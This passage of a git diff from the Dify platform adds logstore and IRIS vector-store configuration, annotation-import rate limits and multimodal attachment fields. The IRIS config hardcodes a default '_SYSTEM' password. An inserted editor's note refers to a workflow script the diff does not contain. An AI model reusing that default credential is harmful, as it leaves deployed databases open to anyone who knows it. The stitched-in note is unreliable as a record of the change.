deleted file mode 100644 index 64fec20cb8..0000000000 --- a/.windsurf/rules/testing.md +++ /dev/null @@ -1,5 +0,0 @@ -# Windsurf Testing Rules - -- Use `web/testing/testing.md` as the single source of truth for frontend automated testing. -- Honor every requirement in that document when generating or accepting tests. -- When proposing or saving tests, re-read that document and follow every requirement. 
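> **Editor's note — uncovered-line ranges.** The Node script in `web-tests.yml` above compresses the sorted uncovered line numbers of each file into compact ranges for the summary table. An equivalent Python re-statement of the `formatLineRanges` helper (a sketch for illustration only, not code from this PR):

```python
def format_line_ranges(lines: list[int]) -> str:
    """Collapse sorted line numbers into ranges, e.g. [1, 2, 3, 7, 9, 10] -> "1-3,7,9-10"."""
    if not lines:
        return ""
    ranges: list[str] = []
    start = end = lines[0]
    for current in lines[1:]:
        if current == end + 1:  # extend the currently open range
            end = current
            continue
        ranges.append(str(start) if start == end else f"{start}-{end}")
        start = end = current
    ranges.append(str(start) if start == end else f"{start}-{end}")
    return ",".join(ranges)


assert format_line_ranges([1, 2, 3, 7, 9, 10]) == "1-3,7,9-10"
assert format_line_ranges([]) == ""
```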
diff --git a/api/.env.example b/api/.env.example
index 35aaabbc10..b87d9c7b02 100644
--- a/api/.env.example
+++ b/api/.env.example
@@ -543,6 +543,25 @@ APP_MAX_EXECUTION_TIME=1200
 APP_DEFAULT_ACTIVE_REQUESTS=0
 APP_MAX_ACTIVE_REQUESTS=0
 
+# Aliyun SLS Logstore Configuration
+# Aliyun Access Key ID
+ALIYUN_SLS_ACCESS_KEY_ID=
+# Aliyun Access Key Secret
+ALIYUN_SLS_ACCESS_KEY_SECRET=
+# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com)
+ALIYUN_SLS_ENDPOINT=
+# Aliyun SLS Region (e.g., cn-hangzhou)
+ALIYUN_SLS_REGION=
+# Aliyun SLS Project Name
+ALIYUN_SLS_PROJECT_NAME=
+# Number of days to retain workflow run logs (default: 365 days, 3650 for permanent storage)
+ALIYUN_SLS_LOGSTORE_TTL=365
+# Enable dual-write to both SLS LogStore and SQL database (default: false)
+LOGSTORE_DUAL_WRITE_ENABLED=false
+# Enable dual-read fallback to SQL database when LogStore returns no results (default: true)
+# Useful for migration scenarios where historical data exists only in SQL database
+LOGSTORE_DUAL_READ_ENABLED=true
+
 # Celery beat configuration
 CELERY_BEAT_SCHEDULER_TIME=1
 
@@ -654,3 +673,25 @@ TENANT_ISOLATED_TASK_CONCURRENCY=1
 
 # Maximum number of segments for dataset segments API (0 for unlimited)
 DATASET_MAX_SEGMENTS_PER_REQUEST=0
+
+# Multimodal knowledge base limits
+SINGLE_CHUNK_ATTACHMENT_LIMIT=10
+ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2
+ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60
+IMAGE_FILE_BATCH_LIMIT=10
+
+# Maximum allowed CSV file size for annotation import in megabytes
+ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2
+# Maximum number of annotation records allowed in a single import
+ANNOTATION_IMPORT_MAX_RECORDS=10000
+# Minimum number of annotation records required in a single import
+ANNOTATION_IMPORT_MIN_RECORDS=1
+ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5
+ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20
+# Maximum number of concurrent annotation import tasks per tenant
+ANNOTATION_IMPORT_MAX_CONCURRENT=5
+
+# Sandbox expired records cleanup configuration
+SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21
+SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000
+SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30
diff --git a/api/README.md b/api/README.md
index 2dab2ec6e6..794b05d3af 100644
--- a/api/README.md
+++ b/api/README.md
@@ -84,7 +84,7 @@
 
 1. If you need to handle and debug the async tasks (e.g. dataset importing and documents indexing), please start the worker service.
 
```bash -uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor +uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention ``` Additionally, if you want to debug the celery scheduled tasks, you can run the following command in another terminal to start the beat service: diff --git a/api/app_factory.py b/api/app_factory.py index 3a3ee03cff..bcad88e9e0 100644 --- a/api/app_factory.py +++ b/api/app_factory.py @@ -75,6 +75,7 @@ def initialize_extensions(app: DifyApp): ext_import_modules, ext_logging, ext_login, + ext_logstore, ext_mail, ext_migrate, ext_orjson, @@ -83,6 +84,7 @@ def initialize_extensions(app: DifyApp): ext_redis, ext_request_logging, ext_sentry, + ext_session_factory, ext_set_secretkey, ext_storage, ext_timezone, @@ -104,6 +106,7 @@ def initialize_extensions(app: DifyApp): ext_migrate, ext_redis, ext_storage, + ext_logstore, # Initialize logstore after storage, before celery ext_celery, ext_login, ext_mail, @@ -114,6 +117,7 @@ def initialize_extensions(app: DifyApp): ext_commands, ext_otel, ext_request_logging, + ext_session_factory, ] for ext in extensions: short_name = ext.__name__.split(".")[-1] diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index b5ffd09d01..43dddbd011 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -218,7 +218,7 @@ class PluginConfig(BaseSettings): PLUGIN_DAEMON_TIMEOUT: PositiveFloat | None = Field( description="Timeout in seconds for requests to the plugin daemon (set to None to disable)", - default=300.0, + default=600.0, ) INNER_API_KEY_FOR_PLUGIN: str = Field(description="Inner api key for plugin", default="inner-api-key") @@ -360,6 +360,57 @@ class FileUploadConfig(BaseSettings): default=10, ) + IMAGE_FILE_BATCH_LIMIT: PositiveInt = Field( + description="Maximum number of files allowed in a image batch upload operation", + default=10, + ) + + SINGLE_CHUNK_ATTACHMENT_LIMIT: PositiveInt = Field( + description="Maximum number of files allowed in a single chunk attachment", + default=10, + ) + + ATTACHMENT_IMAGE_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed image file size for attachments in megabytes", + default=2, + ) + + ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT: NonNegativeInt = Field( + description="Timeout for downloading image attachments in seconds", + default=60, + ) + + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = 
Field(
+        description="Maximum number of annotation import requests per hour per tenant",
+        default=20,
+    )
+
+    ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field(
+        description="Maximum number of concurrent annotation import tasks per tenant",
+        default=2,
+    )
+
     inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field(
         description=(
             "Comma-separated list of file extensions that are blocked from upload. "
@@ -1219,6 +1270,21 @@ class TenantIsolatedTaskQueueConfig(BaseSettings):
     )
 
 
+class SandboxExpiredRecordsCleanConfig(BaseSettings):
+    SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: NonNegativeInt = Field(
+        description="Grace period in days for cleaning sandbox records after subscription expiration",
+        default=21,
+    )
+    SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: PositiveInt = Field(
+        description="Maximum number of records to process in each batch",
+        default=1000,
+    )
+    SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: PositiveInt = Field(
+        description="Retention days for expired sandbox workflow_run and message records",
+        default=30,
+    )
+
+
 class FeatureConfig(
     # place the configs in alphabet order
     AppExecutionConfig,
@@ -1244,6 +1310,7 @@
     PositionConfig,
     RagEtlConfig,
     RepositoryConfig,
+    SandboxExpiredRecordsCleanConfig,
     SecurityConfig,
     TenantIsolatedTaskQueueConfig,
     ToolConfig,
diff --git a/api/configs/middleware/__init__.py b/api/configs/middleware/__init__.py
index a5e35c99ca..63f75924bf 100644
--- a/api/configs/middleware/__init__.py
+++ b/api/configs/middleware/__init__.py
@@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig
 from .vdb.couchbase_config import CouchbaseConfig
 from .vdb.elasticsearch_config import ElasticsearchConfig
 from .vdb.huawei_cloud_config import HuaweiCloudConfig
+from .vdb.iris_config import IrisVectorConfig
 from .vdb.lindorm_config import LindormConfig
 from .vdb.matrixone_config import MatrixoneConfig
 from .vdb.milvus_config import MilvusConfig
@@ -106,7 +107,7 @@ class KeywordStoreConfig(BaseSettings):
 
 class DatabaseConfig(BaseSettings):
     # Database type selector
-    DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field(
+    DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field(
         description="Database type to use. 
OceanBase is MySQL-compatible.", default="postgresql", ) @@ -336,6 +337,7 @@ class MiddlewareConfig( ChromaConfig, ClickzettaConfig, HuaweiCloudConfig, + IrisVectorConfig, MilvusConfig, AlibabaCloudMySQLConfig, MyScaleConfig, diff --git a/api/configs/middleware/vdb/iris_config.py b/api/configs/middleware/vdb/iris_config.py new file mode 100644 index 0000000000..c532d191c3 --- /dev/null +++ b/api/configs/middleware/vdb/iris_config.py @@ -0,0 +1,91 @@ +"""Configuration for InterSystems IRIS vector database.""" + +from pydantic import Field, PositiveInt, model_validator +from pydantic_settings import BaseSettings + + +class IrisVectorConfig(BaseSettings): + """Configuration settings for IRIS vector database connection and pooling.""" + + IRIS_HOST: str | None = Field( + description="Hostname or IP address of the IRIS server.", + default="localhost", + ) + + IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field( + description="Port number for IRIS connection.", + default=1972, + ) + + IRIS_USER: str | None = Field( + description="Username for IRIS authentication.", + default="_SYSTEM", + ) + + IRIS_PASSWORD: str | None = Field( + description="Password for IRIS authentication.", + default="Dify@1234", + ) + + IRIS_SCHEMA: str | None = Field( + description="Schema name for IRIS tables.", + default="dify", + ) + + IRIS_DATABASE: str | None = Field( + description="Database namespace for IRIS connection.", + default="USER", + ) + + IRIS_CONNECTION_URL: str | None = Field( + description="Full connection URL for IRIS (overrides individual fields if provided).", + default=None, + ) + + IRIS_MIN_CONNECTION: PositiveInt = Field( + description="Minimum number of connections in the pool.", + default=1, + ) + + IRIS_MAX_CONNECTION: PositiveInt = Field( + description="Maximum number of connections in the pool.", + default=3, + ) + + IRIS_TEXT_INDEX: bool = Field( + description="Enable full-text search index using %iFind.Index.Basic.", + default=True, + ) + + IRIS_TEXT_INDEX_LANGUAGE: str = Field( + description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').", + default="en", + ) + + @model_validator(mode="before") + @classmethod + def validate_config(cls, values: dict) -> dict: + """Validate IRIS configuration values. + + Args: + values: Configuration dictionary + + Returns: + Validated configuration dictionary + + Raises: + ValueError: If required fields are missing or pool settings are invalid + """ + # Only validate required fields if IRIS is being used as the vector store + # This allows the config to be loaded even when IRIS is not in use + + # vector_store = os.environ.get("VECTOR_STORE", "") + # We rely on Pydantic defaults for required fields if they are missing from env. + # Strict existence check is removed to allow defaults to work. 
+ + min_conn = values.get("IRIS_MIN_CONNECTION", 1) + max_conn = values.get("IRIS_MAX_CONNECTION", 3) + if min_conn > max_conn: + raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION") + + return values diff --git a/api/constants/languages.py b/api/constants/languages.py index 0312a558c9..8c1ce368ac 100644 --- a/api/constants/languages.py +++ b/api/constants/languages.py @@ -20,6 +20,7 @@ language_timezone_mapping = { "sl-SI": "Europe/Ljubljana", "th-TH": "Asia/Bangkok", "id-ID": "Asia/Jakarta", + "ar-TN": "Africa/Tunis", } languages = list(language_timezone_mapping.keys()) diff --git a/api/controllers/console/admin.py b/api/controllers/console/admin.py index 7aa1e6dbd8..a25ca5ef51 100644 --- a/api/controllers/console/admin.py +++ b/api/controllers/console/admin.py @@ -6,19 +6,20 @@ from flask import request from flask_restx import Resource from pydantic import BaseModel, Field, field_validator from sqlalchemy import select -from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound, Unauthorized -P = ParamSpec("P") -R = TypeVar("R") from configs import dify_config from constants.languages import supported_language from controllers.console import console_ns from controllers.console.wraps import only_edition_cloud +from core.db.session_factory import session_factory from extensions.ext_database import db from libs.token import extract_access_token from models.model import App, InstalledApp, RecommendedApp +P = ParamSpec("P") +R = TypeVar("R") + DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}" @@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource): privacy_policy = site.privacy_policy or payload.privacy_policy or "" custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or "" - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id) ).scalar_one_or_none() @@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource): @only_edition_cloud @admin_required def delete(self, app_id): - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == str(app_id)) ).scalar_one_or_none() @@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource): if not recommended_app: return {"result": "success"}, 204 - with Session(db.engine) as session: + with session_factory.create_session() as session: app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none() if app: app.is_public = False - with Session(db.engine) as session: + with session_factory.create_session() as session: installed_apps = ( session.execute( select(InstalledApp).where( diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + 
annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -257,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -272,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") @@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, "Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. 
" + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/app/message.py b/api/controllers/console/app/message.py index 377297c84c..12ada8b798 100644 --- a/api/controllers/console/app/message.py +++ b/api/controllers/console/app/message.py @@ -61,6 +61,7 @@ class ChatMessagesQuery(BaseModel): class MessageFeedbackPayload(BaseModel): message_id: str = Field(..., description="Message ID") rating: Literal["like", "dislike"] | None = Field(default=None, description="Feedback rating") + content: str | None = Field(default=None, description="Feedback content") @field_validator("message_id") @classmethod @@ -324,6 +325,7 @@ class MessageFeedbackApi(Resource): db.session.delete(feedback) elif args.rating and feedback: feedback.rating = args.rating + feedback.content = args.content elif not args.rating and not feedback: raise ValueError("rating cannot be None when feedback not exists") else: @@ -335,6 +337,7 @@ class MessageFeedbackApi(Resource): conversation_id=message.conversation_id, message_id=message.id, rating=rating_value, + content=args.content, from_source="admin", from_account_id=current_user.id, ) diff --git a/api/controllers/console/app/workflow_trigger.py b/api/controllers/console/app/workflow_trigger.py index 5d16e4f979..9433b732e4 100644 --- a/api/controllers/console/app/workflow_trigger.py +++ b/api/controllers/console/app/workflow_trigger.py @@ -114,7 +114,7 @@ class AppTriggersApi(Resource): @console_ns.route("/apps//trigger-enable") class AppTriggerEnableApi(Resource): - @console_ns.expect(console_ns.models[ParserEnable.__name__], validate=True) + @console_ns.expect(console_ns.models[ParserEnable.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/auth/login.py b/api/controllers/console/auth/login.py index f486f4c313..772d98822e 100644 --- a/api/controllers/console/auth/login.py +++ b/api/controllers/console/auth/login.py @@ -22,7 +22,12 @@ from controllers.console.error import ( NotAllowedCreateWorkspace, WorkspacesLimitExceeded, ) -from controllers.console.wraps import email_password_login_enabled, setup_required +from controllers.console.wraps import ( + decrypt_code_field, + decrypt_password_field, + email_password_login_enabled, + setup_required, +) from events.tenant_event import tenant_was_created from libs.helper import EmailStr, extract_remote_ip from libs.login import current_account_with_tenant @@ -79,6 +84,7 @@ class LoginApi(Resource): @setup_required @email_password_login_enabled @console_ns.expect(console_ns.models[LoginPayload.__name__]) + @decrypt_password_field def post(self): """Authenticate user and login.""" args = LoginPayload.model_validate(console_ns.payload) @@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource): class EmailCodeLoginApi(Resource): @setup_required @console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__]) + @decrypt_code_field def post(self): args = EmailCodeLoginPayload.model_validate(console_ns.payload) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 01f268d94d..cd958bbb36 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -140,6 +140,18 @@ class DataSourceNotionListApi(Resource): credential_id = request.args.get("credential_id", default=None, 
type=str) if not credential_id: raise ValueError("Credential id is required.") + + # Get datasource_parameters from query string (optional, for GitHub and other datasources) + datasource_parameters_str = request.args.get("datasource_parameters", default=None, type=str) + datasource_parameters = {} + if datasource_parameters_str: + try: + datasource_parameters = json.loads(datasource_parameters_str) + if not isinstance(datasource_parameters, dict): + raise ValueError("datasource_parameters must be a JSON object.") + except json.JSONDecodeError: + raise ValueError("Invalid datasource_parameters JSON format.") + datasource_provider_service = DatasourceProviderService() credential = datasource_provider_service.get_datasource_credentials( tenant_id=current_tenant_id, @@ -187,7 +199,7 @@ class DataSourceNotionListApi(Resource): online_document_result: Generator[OnlineDocumentPagesMessage, None, None] = ( datasource_runtime.get_online_document_pages( user_id=current_user.id, - datasource_parameters={}, + datasource_parameters=datasource_parameters, provider_type=datasource_runtime.datasource_provider_type(), ) ) @@ -218,14 +230,14 @@ class DataSourceNotionListApi(Resource): @console_ns.route( - "/notion/workspaces//pages///preview", + "/notion/pages///preview", "/datasets/notion-indexing-estimate", ) class DataSourceNotionApi(Resource): @setup_required @login_required @account_initialization_required - def get(self, workspace_id, page_id, page_type): + def get(self, page_id, page_type): _, current_tenant_id = current_account_with_tenant() credential_id = request.args.get("credential_id", default=None, type=str) @@ -239,11 +251,10 @@ class DataSourceNotionApi(Resource): plugin_id="langgenius/notion_datasource", ) - workspace_id = str(workspace_id) page_id = str(page_id) extractor = NotionExtractor( - notion_workspace_id=workspace_id, + notion_workspace_id="", notion_obj_id=page_id, notion_page_type=page_type, notion_access_token=credential.get("integration_secret"), diff --git a/api/controllers/console/datasets/datasets.py b/api/controllers/console/datasets/datasets.py index 1fad8abd52..8ceb896d4f 100644 --- a/api/controllers/console/datasets/datasets.py +++ b/api/controllers/console/datasets/datasets.py @@ -146,11 +146,12 @@ class DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: dict[str, Any] | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None icon_info: dict[str, Any] | None = None + is_multimodal: bool | None = False @field_validator("indexing_technique") @classmethod @@ -222,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.COUCHBASE, VectorType.OPENGAUSS, VectorType.OCEANBASE, + VectorType.SEEKDB, VectorType.TABLESTORE, VectorType.HUAWEI_CLOUD, VectorType.TENCENT, @@ -229,6 +231,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.CLICKZETTA, VectorType.BAIDU, VectorType.ALIBABACLOUD_MYSQL, + VectorType.IRIS, } semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]} @@ -421,19 +424,18 @@ class DatasetApi(Resource): raise NotFound("Dataset not found.") payload = DatasetUpdatePayload.model_validate(console_ns.payload or {}) - payload_data = payload.model_dump(exclude_unset=True) 
current_user, current_tenant_id = current_account_with_tenant() - # check embedding model setting if ( payload.indexing_technique == "high_quality" and payload.embedding_model_provider is not None and payload.embedding_model is not None ): - DatasetService.check_embedding_model_setting( + is_multimodal = DatasetService.check_is_multimodal_model( dataset.tenant_id, payload.embedding_model_provider, payload.embedding_model ) - + payload.is_multimodal = is_multimodal + payload_data = payload.model_dump(exclude_unset=True) # The role of the current user in the ta table must be admin, owner, editor, or dataset_operator DatasetPermissionService.check_permission( current_user, dataset, payload.permission, payload.partial_member_list diff --git a/api/controllers/console/datasets/datasets_document.py b/api/controllers/console/datasets/datasets_document.py index 2520111281..6145da31a5 100644 --- a/api/controllers/console/datasets/datasets_document.py +++ b/api/controllers/console/datasets/datasets_document.py @@ -424,6 +424,10 @@ class DatasetInitApi(Resource): model_type=ModelType.TEXT_EMBEDDING, model=knowledge_config.embedding_model, ) + is_multimodal = DatasetService.check_is_multimodal_model( + current_tenant_id, knowledge_config.embedding_model_provider, knowledge_config.embedding_model + ) + knowledge_config.is_multimodal = is_multimodal except InvokeAuthorizationError: raise ProviderNotInitializeError( "No Embedding Model available. Please configure a valid provider in the Settings -> Model Provider." diff --git a/api/controllers/console/datasets/datasets_segments.py b/api/controllers/console/datasets/datasets_segments.py index ee390cbfb7..e73abc2555 100644 --- a/api/controllers/console/datasets/datasets_segments.py +++ b/api/controllers/console/datasets/datasets_segments.py @@ -51,6 +51,7 @@ class SegmentCreatePayload(BaseModel): content: str answer: str | None = None keywords: list[str] | None = None + attachment_ids: list[str] | None = None class SegmentUpdatePayload(BaseModel): @@ -58,6 +59,7 @@ class SegmentUpdatePayload(BaseModel): answer: str | None = None keywords: list[str] | None = None regenerate_child_chunks: bool = False + attachment_ids: list[str] | None = None class BatchImportPayload(BaseModel): diff --git a/api/controllers/console/datasets/hit_testing_base.py b/api/controllers/console/datasets/hit_testing_base.py index fac90a0135..db7c50f422 100644 --- a/api/controllers/console/datasets/hit_testing_base.py +++ b/api/controllers/console/datasets/hit_testing_base.py @@ -1,7 +1,7 @@ import logging from typing import Any -from flask_restx import marshal +from flask_restx import marshal, reqparse from pydantic import BaseModel, Field from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -33,6 +33,7 @@ class HitTestingPayload(BaseModel): query: str = Field(max_length=250) retrieval_model: dict[str, Any] | None = None external_retrieval_model: dict[str, Any] | None = None + attachment_ids: list[str] | None = None class DatasetsHitTestingBase: @@ -54,16 +55,28 @@ class DatasetsHitTestingBase: def hit_testing_args_check(args: dict[str, Any]): HitTestingService.hit_testing_args_check(args) + @staticmethod + def parse_args(): + parser = ( + reqparse.RequestParser() + .add_argument("query", type=str, required=False, location="json") + .add_argument("attachment_ids", type=list, required=False, location="json") + .add_argument("retrieval_model", type=dict, required=False, location="json") + .add_argument("external_retrieval_model", type=dict, required=False, 
location="json") + ) + return parser.parse_args() + @staticmethod def perform_hit_testing(dataset, args): assert isinstance(current_user, Account) try: response = HitTestingService.retrieve( dataset=dataset, - query=args["query"], + query=args.get("query"), account=current_user, - retrieval_model=args["retrieval_model"], - external_retrieval_model=args["external_retrieval_model"], + retrieval_model=args.get("retrieval_model"), + external_retrieval_model=args.get("external_retrieval_model"), + attachment_ids=args.get("attachment_ids"), limit=10, ) return {"query": response["query"], "records": marshal(response["records"], hit_testing_record_fields)} diff --git a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py index 42387557d6..7caf5b52ed 100644 --- a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py +++ b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py @@ -26,7 +26,7 @@ console_ns.schema_model(Parser.__name__, Parser.model_json_schema(ref_template=D @console_ns.route("/rag/pipelines//workflows/published/datasource/nodes//preview") class DataSourceContentPreviewApi(Resource): - @console_ns.expect(console_ns.models[Parser.__name__], validate=True) + @console_ns.expect(console_ns.models[Parser.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py index debe8eed97..46d67f0581 100644 --- a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py +++ b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py @@ -4,7 +4,7 @@ from typing import Any, Literal, cast from uuid import UUID from flask import abort, request -from flask_restx import Resource, marshal_with # type: ignore +from flask_restx import Resource, marshal_with, reqparse # type: ignore from pydantic import BaseModel, Field from sqlalchemy.orm import Session from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -975,6 +975,11 @@ class RagPipelineRecommendedPluginApi(Resource): @login_required @account_initialization_required def get(self): + parser = reqparse.RequestParser() + parser.add_argument("type", type=str, location="args", required=False, default="all") + args = parser.parse_args() + type = args["type"] + rag_pipeline_service = RagPipelineService() - recommended_plugins = rag_pipeline_service.get_recommended_plugins() + recommended_plugins = rag_pipeline_service.get_recommended_plugins(type) return recommended_plugins diff --git a/api/controllers/console/explore/completion.py b/api/controllers/console/explore/completion.py index 78e9a87a3d..a6e5b2822a 100644 --- a/api/controllers/console/explore/completion.py +++ b/api/controllers/console/explore/completion.py @@ -2,7 +2,7 @@ import logging from typing import Any, Literal from uuid import UUID -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import InternalServerError, NotFound import services @@ -40,7 +40,7 @@ from .. 
import console_ns logger = logging.getLogger(__name__) -class CompletionMessagePayload(BaseModel): +class CompletionMessageExplorePayload(BaseModel): inputs: dict[str, Any] query: str = "" files: list[dict[str, Any]] | None = None @@ -52,12 +52,26 @@ class ChatMessagePayload(BaseModel): inputs: dict[str, Any] query: str files: list[dict[str, Any]] | None = None - conversation_id: UUID | None = None - parent_message_id: UUID | None = None + conversation_id: str | None = None + parent_message_id: str | None = None retriever_from: str = Field(default="explore_app") + @field_validator("conversation_id", "parent_message_id", mode="before") + @classmethod + def normalize_uuid(cls, value: str | UUID | None) -> str | None: + """ + Accept blank IDs and validate UUID format when provided. + """ + if not value: + return None -register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) + try: + return helper.uuid_value(value) + except ValueError as exc: + raise ValueError("must be a valid UUID") from exc + + +register_schema_models(console_ns, CompletionMessageExplorePayload, ChatMessagePayload) # define completion api for user @@ -66,13 +80,13 @@ register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) endpoint="installed_app_completion", ) class CompletionApi(InstalledAppResource): - @console_ns.expect(console_ns.models[CompletionMessagePayload.__name__]) + @console_ns.expect(console_ns.models[CompletionMessageExplorePayload.__name__]) def post(self, installed_app): app_model = installed_app.app if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - payload = CompletionMessagePayload.model_validate(console_ns.payload or {}) + payload = CompletionMessageExplorePayload.model_validate(console_ns.payload or {}) args = payload.model_dump(exclude_none=True) streaming = payload.response_mode == 